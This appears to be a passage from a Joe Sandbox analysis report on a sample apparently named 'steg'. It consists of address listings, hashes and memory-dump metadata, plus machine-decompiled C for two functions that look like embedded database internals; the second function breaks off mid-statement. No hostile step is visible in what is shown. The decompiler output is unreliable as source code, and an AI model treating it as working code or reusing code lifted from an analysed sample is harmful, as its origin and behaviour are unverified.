                                                                                                                    0x00fbbd11
                                                                                                                    0x00fbbd26
                                                                                                                    0x00fbb987
                                                                                                                    0x00fbb987
                                                                                                                    0x00fbb987
                                                                                                                    0x00fbb989
                                                                                                                    0x00fbb98f
                                                                                                                    0x00fbb98f
                                                                                                                    0x00fbb997
                                                                                                                    0x00fbb997
                                                                                                                    0x00fbb99b
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00fbb99f
                                                                                                                    0x00fbb9b3
                                                                                                                    0x00fbb9b3
                                                                                                                    0x00fbb9a1
                                                                                                                    0x00fbb9a1
                                                                                                                    0x00fbb9a7
                                                                                                                    0x00000000
                                                                                                                    0x00fbb9a9
                                                                                                                    0x00fbb9a9
                                                                                                                    0x00fbb9ac
                                                                                                                    0x00fbb9b1
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00fbb9b1
                                                                                                                    0x00fbb9a7
                                                                                                                    0x00fbb9bc
                                                                                                                    0x00fbb9be
                                                                                                                    0x00000000
                                                                                                                    0x00fbb9d0
                                                                                                                    0x00fbb9d0
                                                                                                                    0x00fbb9d6
                                                                                                                    0x00fbb9d7
                                                                                                                    0x00fbb9fc
                                                                                                                    0x00fbb9fc
                                                                                                                    0x00fbb9ff
                                                                                                                    0x00fbba02
                                                                                                                    0x00fbba02
                                                                                                                    0x00000000
                                                                                                                    0x00fbb9d9
                                                                                                                    0x00fbb9e4
                                                                                                                    0x00fbb9e7
                                                                                                                    0x00fbb9e7
                                                                                                                    0x00fbb9eb
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00fbb9f6
                                                                                                                    0x00fbb9f9
                                                                                                                    0x00fbb9fa
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00fbb9fa
                                                                                                                    0x00fbbb30
                                                                                                                    0x00fbbb39
                                                                                                                    0x00fbbb44
                                                                                                                    0x00fbbb4a
                                                                                                                    0x00fbbb67
                                                                                                                    0x00fbbb67
                                                                                                                    0x00fbb9d7
                                                                                                                    0x00000000
                                                                                                                    0x00fbb9be
                                                                                                                    0x00fbb9b7
                                                                                                                    0x00fbb9b9
                                                                                                                    0x00000000
                                                                                                                    0x00fbb9c7
                                                                                                                    0x00fbb9c7
                                                                                                                    0x00fbb9ca
                                                                                                                    0x00000000
                                                                                                                    0x00fbb9ce
                                                                                                                    0x00fbb901
                                                                                                                    0x00fbb902
                                                                                                                    0x00000000
                                                                                                                    0x00fbb907
                                                                                                                    0x00fbb8ff
                                                                                                                    0x00fbb8c0
                                                                                                                    0x00fbb8b5
                                                                                                                    0x00000000

                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.282081034.0000000000F82000.00000002.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.282060224.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_f80000_steg.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: _memset
                                                                                                                    • String ID: 8bG$@aA
                                                                                                                    • API String ID: 2102423945-2348318730
                                                                                                                    • Opcode ID: 35f34800dfe30e8a64b0424f7a5e03b0dd3ac5f5a7aec775153db741aad45264
                                                                                                                    • Instruction ID: 3f19f1ac5e1cd32202dfe1d783376c89fa8afa807f940f92cb0cceb9186243d1
                                                                                                                    • Opcode Fuzzy Hash: 35f34800dfe30e8a64b0424f7a5e03b0dd3ac5f5a7aec775153db741aad45264
                                                                                                                    • Instruction Fuzzy Hash: AAF1F1B0E002458BDB20DF66C881BAABBB5FF14314F14446EE8499B312E7B5E944EF91
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00FCD687 Relevance: 5.6, APIs: 2, Strings: 1, Instructions: 358COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 58%
                                                                                                                    			E00FCD687(signed int _a4, signed int _a8, intOrPtr _a12, intOrPtr _a16, signed int* _a20, signed int _a24) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed short _v28;
				signed int _v32;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t125;
				signed int _t127;
				signed int _t129;
				intOrPtr _t134;
				signed int _t140;
				signed int _t142;
				void* _t143;
				signed int _t144;
				signed int _t145;
				signed short _t149;
				signed int _t151;
				signed int _t158;
				signed int _t161;
				signed int _t170;
				signed int _t177;
				intOrPtr _t178;
				signed int _t181;
				signed int _t182;
				signed int _t183;
				signed int _t184;
				signed int _t185;
				signed int _t186;
				intOrPtr _t187;
				signed int _t188;
				signed int _t189;
				intOrPtr* _t191;
				signed int _t192;
				signed int _t195;
				signed int _t196;
				void* _t197;
				void* _t198;
				void* _t200;
				intOrPtr _t207;

				_t195 = _a4;
				_v12 = 0;
				_t177 = E00FBE727(_t195, 0x20c);
				_t198 = _t197 + 8;
				_v32 = _t177;
				if(_t177 == 0) {
					_t185 = 7;
					L79:
					if(_t195 == 0 || _t177 == 0 || _t177 <  *((intOrPtr*)(_t195 + 0xe8)) || _t177 >=  *((intOrPtr*)(_t195 + 0xec))) {
						E00F97247(_t177);
						_t198 = _t198 + 4;
					} else {
						 *_t177 =  *(_t195 + 0xe4);
						 *((intOrPtr*)(_t195 + 0xdc)) =  *((intOrPtr*)(_t195 + 0xdc)) - 1;
						 *(_t195 + 0xe4) = _t177;
					}
					if(_t195 == 0) {
						__eflags = 0xff;
						return 0x000000ff & _t185;
					} else {
						if( *((char*)(_t195 + 0x1e)) != 0 || _t185 == 0xc0a) {
							_push(0);
							_push(7);
							_push(_t195);
							E00FC04F7(_t185);
							 *((char*)(_t195 + 0x1e)) = 0;
							_t185 = 7;
						}
						return  *(_t195 + 0x18) & _t185;
					}
				}
				E00FE7C87(_t177, 0, 0x20c);
				_t186 = 0;
				_t200 = _t198 + 0xc;
				if( *((intOrPtr*)(_t195 + 4)) <= 0) {
					L7:
					_t187 = _a12;
					_t125 = _a8;
					 *_t177 = _t195;
					_t207 = _t187;
					if(_t207 < 0 || _t207 != 0 &&  *((char*)(_t125 + _t187 - 1)) == 0) {
						_t179 =  &_v12;
						E00FCEDB7(_t177, _t125,  &_v12);
						_t200 = _t200 + 0xc;
						goto L21;
					} else {
						if(_t187 <=  *((intOrPtr*)(_t195 + 0x4c))) {
							__eflags = _t125;
							if(_t125 == 0) {
								L19:
								 *((intOrPtr*)(_t177 + 0x1dc)) = _t125 + _t187;
								L21:
								__eflags =  *((char*)(_t195 + 0x1e));
								if( *((char*)(_t195 + 0x1e)) != 0) {
									 *(_t177 + 4) = 7;
								}
								__eflags =  *(_t177 + 4) - 0x65;
								if( *(_t177 + 4) == 0x65) {
									 *(_t177 + 4) = 0;
								}
								__eflags =  *((char*)(_t177 + 0x12));
								if(__eflags != 0) {
									_t158 = E00FB4617(_t177, _t195, __eflags, _t195);
									_t200 = _t200 + 4;
									__eflags = _t158;
									if(_t158 == 0) {
										 *(_t177 + 4) = 0x11;
									}
								}
								__eflags =  *(_t177 + 4) - 0x11;
								if( *(_t177 + 4) == 0x11) {
									E00FCE577(_t179, _t195, 0);
									_t200 = _t200 + 8;
								}
								__eflags =  *((char*)(_t195 + 0x1e));
								if( *((char*)(_t195 + 0x1e)) != 0) {
									 *(_t177 + 4) = 7;
								}
								_t180 = _a24;
								__eflags = _t180;
								if(_t180 != 0) {
									 *_t180 =  *((intOrPtr*)(_t177 + 0x1dc));
								}
								_t127 =  *(_t177 + 4);
								_v8 = _t127;
								__eflags = _t127;
								if(_t127 != 0) {
									L60:
									__eflags =  *((char*)(_t195 + 0x78));
									if( *((char*)(_t195 + 0x78)) == 0) {
										_t180 = _a8;
										__eflags =  *((intOrPtr*)(_t177 + 0x1dc)) - _a8;
										E00FDF077( *((intOrPtr*)(_t177 + 0x1dc)) - _a8,  *(_t177 + 0xc), _a8,  *((intOrPtr*)(_t177 + 0x1dc)) - _a8, _a16);
										_t200 = _t200 + 0x10;
									}
									_t188 =  *(_t177 + 0xc);
									__eflags = _t188;
									if(_t188 == 0) {
										L71:
										 *_a20 = _t188;
										goto L72;
									} else {
										__eflags = _v8;
										if(_v8 != 0) {
											L65:
											_t134 =  *((intOrPtr*)(_t188 + 0x44));
											__eflags = _t134 - 0xbdf20da3;
											if(__eflags == 0) {
												L69:
												E00FDE907(_t180, __eflags, _t188);
												_t200 = _t200 + 4;
												L70:
												E00FD6BF7(_t177, _t188);
												_t200 = _t200 + 4;
												L72:
												_t129 = _v12;
												_t185 = _v8;
												__eflags = _t129;
												if(_t129 == 0) {
													_push(0);
													_push(_t185);
													_push(_t195);
													E00FC04F7(_t185);
													_t198 = _t200 + 0xc;
													goto L79;
												}
												E00FC04F7(_t185, _t195, _t185, 0x470310, _t129);
												_t181 = _v12;
												_t198 = _t200 + 0x10;
												__eflags = _t181 -  *((intOrPtr*)(_t195 + 0xe8));
												if(_t181 <  *((intOrPtr*)(_t195 + 0xe8))) {
													L76:
													E00F97247(_t181);
													_t198 = _t198 + 4;
													goto L79;
												}
												__eflags = _t181 -  *((intOrPtr*)(_t195 + 0xec));
												if(_t181 >=  *((intOrPtr*)(_t195 + 0xec))) {
													goto L76;
												}
												 *_t181 =  *(_t195 + 0xe4);
												 *((intOrPtr*)(_t195 + 0xdc)) =  *((intOrPtr*)(_t195 + 0xdc)) - 1;
												 *(_t195 + 0xe4) = _t181;
												goto L79;
											}
											__eflags = _t134 - 0x519c2973;
											if(__eflags == 0) {
												goto L69;
											}
											__eflags = _t134 - 0x26bceaa5;
											if(_t134 == 0x26bceaa5) {
												goto L70;
											}
											goto L72;
										}
										__eflags =  *((char*)(_t195 + 0x1e));
										if( *((char*)(_t195 + 0x1e)) == 0) {
											goto L71;
										}
										goto L65;
									}
								} else {
									_t140 =  *(_t177 + 0xc);
									__eflags = _t140;
									if(_t140 == 0) {
										goto L60;
									}
									_t180 =  *((intOrPtr*)(_t177 + 0x1bc));
									__eflags = _t180;
									if(_t180 == 0) {
										goto L60;
									}
									__eflags = _t180 - 2;
									if(_t180 != 2) {
										E00FDEFB7(_t140, 8);
										_t200 = _t200 + 8;
										_t142 = 0;
										__eflags = 0;
										_t180 = 8;
									} else {
										E00FDEFB7(_t140, 3);
										_t142 = 8;
										_t200 = _t200 + 8;
										_t53 = _t142 + 3; // 0xb
										_t180 = _t53;
									}
									_v24 = _t180;
									_v20 = _t142;
									__eflags = _t142 - _t180;
									if(_t142 < _t180) {
										_t184 = 0;
										__eflags = 0;
										_v16 = 0;
										_t196 = _t142;
										do {
											_t189 =  *(_t177 + 0xc);
											_t180 =  *(0x472bd4 + _t196 * 4);
											_t143 =  *_t189;
											_v20 = _t180;
											__eflags =  *((char*)(_t143 + 0x1e));
											if( *((char*)(_t143 + 0x1e)) != 0) {
												goto L58;
											}
											_t191 =  *((intOrPtr*)(_t189 + 0x28)) + _t184;
											__eflags = _t180;
											if(_t180 != 0) {
												_t144 =  *(_t191 + 0x10);
												__eflags = _t144;
												if(_t144 == 0) {
													_t145 = 0x3b9aca00;
												} else {
													_t145 =  *(_t144 + 0x48);
												}
												_t178 = 0;
												__eflags = _t145;
												if(_t145 < 0) {
													L53:
													_v28 = 0x202;
													_push(_t191);
													__eflags = 0 - 0x433f60;
													if(0 != 0x433f60) {
														E00FDDBA7();
														 *(_t191 + 0x14) = _v20;
														_t149 = 0xa02;
													} else {
														E00FDDBA7();
														_t151 = _v20;
														 *(_t191 + 0x14) = _t151;
														 *(_t191 + 0x24) = _t151;
														_t149 = _v28;
													}
													_t184 = _v16;
													 *((intOrPtr*)(_t191 + 0x18)) = _t178;
													_t177 = _v32;
													 *(_t191 + 0x20) = 0;
													_t200 = _t200 + 4;
													 *((short*)(_t191 + 0x1e)) = 0x103;
													L57:
													 *(_t191 + 0x1c) = _t149;
													goto L58;
												} else {
													while(1) {
														__eflags =  *((char*)(_t178 + _t180));
														if( *((char*)(_t178 + _t180)) == 0) {
															goto L53;
														}
														_t178 = _t178 + 1;
														__eflags = _t178 - _t145;
														if(_t178 <= _t145) {
															continue;
														}
														goto L53;
													}
													goto L53;
												}
											}
											__eflags =  *(_t191 + 0x1c) & 0x00000020;
											if(( *(_t191 + 0x1c) & 0x00000020) != 0) {
												E00FCEBA7( *_t191);
												_t184 = _v16;
												_t200 = _t200 + 4;
											}
											_t180 = 0xbf01;
											_t149 =  *(_t191 + 0x1c) & 0x0000bf01 | 0x00000001;
											 *((char*)(_t191 + 0x1e)) = 5;
											goto L57;
											L58:
											_t196 = _t196 + 1;
											_t184 = _t184 + 0x28;
											_v16 = _t184;
											__eflags = _t196 - _v24;
										} while (_t196 < _v24);
										_t195 = _a4;
									}
									goto L60;
								}
							}
							_t161 = E00FBE727(_t195, _t187 + 1);
							_t200 = _t200 + 8;
							_v16 = _t161;
							__eflags = _t161;
							if(_t161 == 0) {
								_t125 = _a8;
								goto L19;
							}
							E00FE7337(_t161, _a8, _t187);
							 *((char*)(_v16 + _t187)) = 0;
							_t192 = _v16;
							E00FCEDB7(_t177, _t192,  &_v12);
							E00FBE6D7(_t195, _t192);
							_t200 = _t200 + 0x20;
							 *((intOrPtr*)(_t177 + 0x1dc)) =  *((intOrPtr*)(_t177 + 0x1dc)) + _a8 - _t192;
							goto L21;
						}
						_push(0x478194);
						_push(0x12);
						_push(_t195);
						E00FC04F7(_t187);
						_t198 = _t200 + 0xc;
						_t170 = 0x12;
						if( *((char*)(_t195 + 0x1e)) != 0) {
							_push(0);
							_push(7);
							_push(_t195);
							E00FC04F7(_t187);
							_t198 = _t198 + 0xc;
							 *((char*)(_t195 + 0x1e)) = 0;
							_t170 = 7;
						}
						_t185 =  *(_t195 + 0x18) & _t170;
						goto L79;
					}
				} else {
					_t182 = 0;
					_v16 = 0;
					do {
						_t173 =  *((intOrPtr*)(_t182 +  *((intOrPtr*)(_t195 + 8)) + 4));
						if( *((intOrPtr*)(_t182 +  *((intOrPtr*)(_t195 + 8)) + 4)) == 0) {
							goto L6;
						}
						_t183 = E00FBC2F7(_t173);
						_t200 = _t200 + 4;
						_v8 = _t183;
						if(_t183 != 0) {
							E00FC04F7(_t186 + _t186, _t195, _t183, 0x478174,  *((intOrPtr*)( *((intOrPtr*)(_t195 + 8)) + (_t186 + _t186) * 8)));
							_t185 = _v8;
							_t198 = _t200 + 0x10;
							goto L79;
						}
						_t182 = _v16;
						L6:
						_t186 = _t186 + 1;
						_t182 = _t182 + 0x10;
						_v16 = _t182;
					} while (_t186 <  *((intOrPtr*)(_t195 + 4)));
					goto L7;
				}
			}














































                                                                                                                    0x00fcd68f
                                                                                                                    0x00fcd699
                                                                                                                    0x00fcd6a5
                                                                                                                    0x00fcd6a7
                                                                                                                    0x00fcd6aa
                                                                                                                    0x00fcd6af
                                                                                                                    0x00fcda4b
                                                                                                                    0x00fcda50
                                                                                                                    0x00fcda52
                                                                                                                    0x00fcda7f
                                                                                                                    0x00fcda84
                                                                                                                    0x00fcda68
                                                                                                                    0x00fcda6e
                                                                                                                    0x00fcda70
                                                                                                                    0x00fcda76
                                                                                                                    0x00fcda76
                                                                                                                    0x00fcda89
                                                                                                                    0x00fcdac0
                                                                                                                    0x00fcdac8
                                                                                                                    0x00fcda8b
                                                                                                                    0x00fcda8f
                                                                                                                    0x00fcda99
                                                                                                                    0x00fcda9b
                                                                                                                    0x00fcda9d
                                                                                                                    0x00fcda9e
                                                                                                                    0x00fcdaa6
                                                                                                                    0x00fcdaaa
                                                                                                                    0x00fcdaaa
                                                                                                                    0x00fcdaba
                                                                                                                    0x00fcdaba
                                                                                                                    0x00fcda89
                                                                                                                    0x00fcd6bd
                                                                                                                    0x00fcd6c2
                                                                                                                    0x00fcd6c4
                                                                                                                    0x00fcd6ca
                                                                                                                    0x00fcd703
                                                                                                                    0x00fcd703
                                                                                                                    0x00fcd706
                                                                                                                    0x00fcd709
                                                                                                                    0x00fcd70b
                                                                                                                    0x00fcd70d
                                                                                                                    0x00fcd7da
                                                                                                                    0x00fcd7e0
                                                                                                                    0x00fcd7e5
                                                                                                                    0x00000000
                                                                                                                    0x00fcd720
                                                                                                                    0x00fcd723
                                                                                                                    0x00fcd77f
                                                                                                                    0x00fcd781
                                                                                                                    0x00fcd7d0
                                                                                                                    0x00fcd7d2
                                                                                                                    0x00fcd7e8
                                                                                                                    0x00fcd7e8
                                                                                                                    0x00fcd7ec
                                                                                                                    0x00fcd7ee
                                                                                                                    0x00fcd7ee
                                                                                                                    0x00fcd7f5
                                                                                                                    0x00fcd7f9
                                                                                                                    0x00fcd7fb
                                                                                                                    0x00fcd7fb
                                                                                                                    0x00fcd802
                                                                                                                    0x00fcd806
                                                                                                                    0x00fcd809
                                                                                                                    0x00fcd80e
                                                                                                                    0x00fcd811
                                                                                                                    0x00fcd813
                                                                                                                    0x00fcd815
                                                                                                                    0x00fcd815
                                                                                                                    0x00fcd813
                                                                                                                    0x00fcd81c
                                                                                                                    0x00fcd820
                                                                                                                    0x00fcd825
                                                                                                                    0x00fcd82a
                                                                                                                    0x00fcd82a
                                                                                                                    0x00fcd82d
                                                                                                                    0x00fcd831
                                                                                                                    0x00fcd833
                                                                                                                    0x00fcd833
                                                                                                                    0x00fcd83a
                                                                                                                    0x00fcd83d
                                                                                                                    0x00fcd83f
                                                                                                                    0x00fcd847
                                                                                                                    0x00fcd847
                                                                                                                    0x00fcd849
                                                                                                                    0x00fcd84c
                                                                                                                    0x00fcd84f
                                                                                                                    0x00fcd851
                                                                                                                    0x00fcd988
                                                                                                                    0x00fcd988
                                                                                                                    0x00fcd98c
                                                                                                                    0x00fcd98e
                                                                                                                    0x00fcd99a
                                                                                                                    0x00fcd9a1
                                                                                                                    0x00fcd9a6
                                                                                                                    0x00fcd9a6
                                                                                                                    0x00fcd9a9
                                                                                                                    0x00fcd9ac
                                                                                                                    0x00fcd9ae
                                                                                                                    0x00fcd9ea
                                                                                                                    0x00fcd9ed
                                                                                                                    0x00000000
                                                                                                                    0x00fcd9b0
                                                                                                                    0x00fcd9b0
                                                                                                                    0x00fcd9b4
                                                                                                                    0x00fcd9bc
                                                                                                                    0x00fcd9bc
                                                                                                                    0x00fcd9bf
                                                                                                                    0x00fcd9c4
                                                                                                                    0x00fcd9d6
                                                                                                                    0x00fcd9d7
                                                                                                                    0x00fcd9dc
                                                                                                                    0x00fcd9df
                                                                                                                    0x00fcd9e0
                                                                                                                    0x00fcd9e5
                                                                                                                    0x00fcd9ef
                                                                                                                    0x00fcd9ef
                                                                                                                    0x00fcd9f2
                                                                                                                    0x00fcd9f5
                                                                                                                    0x00fcd9f7
                                                                                                                    0x00fcda3d
                                                                                                                    0x00fcda3f
                                                                                                                    0x00fcda40
                                                                                                                    0x00fcda41
                                                                                                                    0x00fcda46
                                                                                                                    0x00000000
                                                                                                                    0x00fcda46
                                                                                                                    0x00fcda01
                                                                                                                    0x00fcda06
                                                                                                                    0x00fcda09
                                                                                                                    0x00fcda0c
                                                                                                                    0x00fcda12
                                                                                                                    0x00fcda32
                                                                                                                    0x00fcda33
                                                                                                                    0x00fcda38
                                                                                                                    0x00000000
                                                                                                                    0x00fcda38
                                                                                                                    0x00fcda14
                                                                                                                    0x00fcda1a
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00fcda22
                                                                                                                    0x00fcda24
                                                                                                                    0x00fcda2a
                                                                                                                    0x00000000
                                                                                                                    0x00fcda2a
                                                                                                                    0x00fcd9c6
                                                                                                                    0x00fcd9cb
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00fcd9cd
                                                                                                                    0x00fcd9d2
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00fcd9d4
                                                                                                                    0x00fcd9b6
                                                                                                                    0x00fcd9ba
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00fcd9ba
                                                                                                                    0x00fcd857
                                                                                                                    0x00fcd857
                                                                                                                    0x00fcd85a
                                                                                                                    0x00fcd85c
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00fcd862
                                                                                                                    0x00fcd868
                                                                                                                    0x00fcd86a
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00fcd870
                                                                                                                    0x00fcd873
                                                                                                                    0x00fcd88d
                                                                                                                    0x00fcd892
                                                                                                                    0x00fcd895
                                                                                                                    0x00fcd895
                                                                                                                    0x00fcd897
                                                                                                                    0x00fcd875
                                                                                                                    0x00fcd878
                                                                                                                    0x00fcd87d
                                                                                                                    0x00fcd882
                                                                                                                    0x00fcd885
                                                                                                                    0x00fcd885
                                                                                                                    0x00fcd885
                                                                                                                    0x00fcd89c
                                                                                                                    0x00fcd89f
                                                                                                                    0x00fcd8a2
                                                                                                                    0x00fcd8a4
                                                                                                                    0x00fcd8aa
                                                                                                                    0x00fcd8aa
                                                                                                                    0x00fcd8ac
                                                                                                                    0x00fcd8af
                                                                                                                    0x00fcd8b7
                                                                                                                    0x00fcd8b7
                                                                                                                    0x00fcd8ba
                                                                                                                    0x00fcd8c1
                                                                                                                    0x00fcd8c3
                                                                                                                    0x00fcd8c6
                                                                                                                    0x00fcd8ca
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00fcd8d3
                                                                                                                    0x00fcd8d5
                                                                                                                    0x00fcd8d7
                                                                                                                    0x00fcd902
                                                                                                                    0x00fcd905
                                                                                                                    0x00fcd907
                                                                                                                    0x00fcd90e
                                                                                                                    0x00fcd909
                                                                                                                    0x00fcd909
                                                                                                                    0x00fcd909
                                                                                                                    0x00fcd913
                                                                                                                    0x00fcd915
                                                                                                                    0x00fcd917
                                                                                                                    0x00fcd924
                                                                                                                    0x00fcd926
                                                                                                                    0x00fcd92d
                                                                                                                    0x00fcd92e
                                                                                                                    0x00fcd933
                                                                                                                    0x00fcd948
                                                                                                                    0x00fcd950
                                                                                                                    0x00fcd953
                                                                                                                    0x00fcd935
                                                                                                                    0x00fcd935
                                                                                                                    0x00fcd93a
                                                                                                                    0x00fcd93d
                                                                                                                    0x00fcd940
                                                                                                                    0x00fcd943
                                                                                                                    0x00fcd943
                                                                                                                    0x00fcd958
                                                                                                                    0x00fcd95b
                                                                                                                    0x00fcd95e
                                                                                                                    0x00fcd961
                                                                                                                    0x00fcd968
                                                                                                                    0x00fcd96b
                                                                                                                    0x00fcd971
                                                                                                                    0x00fcd971
                                                                                                                    0x00000000
                                                                                                                    0x00fcd919
                                                                                                                    0x00fcd919
                                                                                                                    0x00fcd919
                                                                                                                    0x00fcd91d
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00fcd91f
                                                                                                                    0x00fcd920
                                                                                                                    0x00fcd922
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00fcd922
                                                                                                                    0x00000000
                                                                                                                    0x00fcd919
                                                                                                                    0x00fcd917
                                                                                                                    0x00fcd8d9
                                                                                                                    0x00fcd8dd
                                                                                                                    0x00fcd8e1
                                                                                                                    0x00fcd8e6
                                                                                                                    0x00fcd8e9
                                                                                                                    0x00fcd8e9
                                                                                                                    0x00fcd8f0
                                                                                                                    0x00fcd8f8
                                                                                                                    0x00fcd8fc
                                                                                                                    0x00000000
                                                                                                                    0x00fcd975
                                                                                                                    0x00fcd975
                                                                                                                    0x00fcd976
                                                                                                                    0x00fcd979
                                                                                                                    0x00fcd97c
                                                                                                                    0x00fcd97c
                                                                                                                    0x00fcd985
                                                                                                                    0x00fcd985
                                                                                                                    0x00000000
                                                                                                                    0x00fcd8a4
                                                                                                                    0x00fcd851
                                                                                                                    0x00fcd788
                                                                                                                    0x00fcd78d
                                                                                                                    0x00fcd790
                                                                                                                    0x00fcd793
                                                                                                                    0x00fcd795
                                                                                                                    0x00fcd7cd
                                                                                                                    0x00000000
                                                                                                                    0x00fcd7cd
                                                                                                                    0x00fcd79c
                                                                                                                    0x00fcd7a4
                                                                                                                    0x00fcd7a8
                                                                                                                    0x00fcd7b1
                                                                                                                    0x00fcd7b8
                                                                                                                    0x00fcd7c2
                                                                                                                    0x00fcd7c5
                                                                                                                    0x00000000
                                                                                                                    0x00fcd7c5
                                                                                                                    0x00fcd725
                                                                                                                    0x00fcd72a
                                                                                                                    0x00fcd72c
                                                                                                                    0x00fcd72d
                                                                                                                    0x00fcd732
                                                                                                                    0x00fcd739
                                                                                                                    0x00fcd73e
                                                                                                                    0x00fcd740
                                                                                                                    0x00fcd742
                                                                                                                    0x00fcd744
                                                                                                                    0x00fcd745
                                                                                                                    0x00fcd74a
                                                                                                                    0x00fcd74d
                                                                                                                    0x00fcd751
                                                                                                                    0x00fcd751
                                                                                                                    0x00fcd759
                                                                                                                    0x00000000
                                                                                                                    0x00fcd759
                                                                                                                    0x00fcd6cc
                                                                                                                    0x00fcd6cc
                                                                                                                    0x00fcd6ce
                                                                                                                    0x00fcd6d7
                                                                                                                    0x00fcd6da
                                                                                                                    0x00fcd6e0
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00fcd6e8
                                                                                                                    0x00fcd6ea
                                                                                                                    0x00fcd6ed
                                                                                                                    0x00fcd6f2
                                                                                                                    0x00fcd76f
                                                                                                                    0x00fcd774
                                                                                                                    0x00fcd777
                                                                                                                    0x00000000
                                                                                                                    0x00fcd777
                                                                                                                    0x00fcd6f4
                                                                                                                    0x00fcd6f7
                                                                                                                    0x00fcd6f7
                                                                                                                    0x00fcd6f8
                                                                                                                    0x00fcd6fb
                                                                                                                    0x00fcd6fe
                                                                                                                    0x00000000
                                                                                                                    0x00fcd6d7

                                                                                                                    APIs
                                                                                                                    • _memset.LIBCMT ref: 00FCD6BD
                                                                                                                    • _memmove.LIBCMT ref: 00FCD79C
                                                                                                                      • Part of subcall function 00FDEFB7: _memset.LIBCMT ref: 00FDF037
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.282081034.0000000000F82000.00000002.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.282060224.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_f80000_steg.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: _memset$_memmove
                                                                                                                    • String ID: `?C
                                                                                                                    • API String ID: 2532777613-10299428
                                                                                                                    • Opcode ID: 0768126f05df1d33f4908a53b53d999d03d70249aa0c6b8790922ed04c39da5d
                                                                                                                    • Instruction ID: f244947109fe34c9095b728c87ba79f5a32ce97c99d509b8cc65da29301cedb4
                                                                                                                    • Opcode Fuzzy Hash: 0768126f05df1d33f4908a53b53d999d03d70249aa0c6b8790922ed04c39da5d
                                                                                                                    • Instruction Fuzzy Hash: 87D1F771D00247ABDB24DF54CD82FAEB7B4AF40314F14807DE8499B642E739E945EBA1
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00FC7267 Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 302COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 79%
                                                                                                                    			E00FC7267(char _a4, signed short _a8, intOrPtr _a12) {
				signed int _v8;
				signed char _v12;
				intOrPtr _v16;
				char _v20;
				char _v24;
				char _v28;
				signed int _v32;
				intOrPtr _v36;
				signed int _v40;
				signed int _v44;
				intOrPtr _v48;
				signed int _v52;
				intOrPtr _v56;
				char* _v60;
				signed int _v64;
				intOrPtr _v68;
				signed short _v72;
				char _v76;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t141;
				void* _t148;
				signed int _t150;
				signed int _t156;
				signed int _t163;
				intOrPtr _t168;
				intOrPtr _t173;
				signed int _t176;
				intOrPtr _t179;
				signed int _t186;
				intOrPtr _t195;
				signed int _t202;
				intOrPtr _t203;
				void* _t204;
				signed int _t205;
				signed int _t206;
				intOrPtr _t207;
				signed char _t213;
				intOrPtr _t215;
				char _t216;
				char _t224;
				signed short _t225;
				void* _t227;
				signed int _t228;
				void* _t230;
				signed int _t232;
				void* _t233;
				void* _t234;
				void* _t235;
				void* _t236;
				void* _t237;
				void* _t238;

				_v8 =  *0x481f80 ^ _t232;
				_t207 = _a12;
				_t230 = _a4;
				_t225 = _a8;
				_v52 = _t230;
				_v40 = _t225;
				_v56 = _t207;
				if(_t225 != 1) {
					_t141 = 0x472428;
					_t224 = 0x4767d0;
				} else {
					_t141 = 0x472490;
					_t224 = 0x4767bc;
				}
				_v16 = _t141;
				_push(0);
				_v48 = _t224;
				_v24 = _t224;
				_v20 = 0x475844;
				_v12 = 0;
				_v76 = _t230;
				_v72 = _t225;
				_v64 = 0;
				_v68 = _t207;
				E00FC70A7( &_v76, 3,  &_v24);
				_t202 = _v64;
				_t234 = _t233 + 0x10;
				if(_t202 != 0) {
					L25:
					__eflags = _t202 - 7;
					if(_t202 == 7) {
						goto L57;
					} else {
						__eflags = _t202 - 0xc0a;
						if(_t202 == 0xc0a) {
							goto L57;
						}
					}
					goto L58;
				} else {
					_v32 = _t225 << 4;
					_t148 = E00FC3C67(_t230, _v48,  *((intOrPtr*)( *((intOrPtr*)(_t230 + 8)) + (_t225 << 4))));
					_t235 = _t234 + 0xc;
					if(_t148 != 0) {
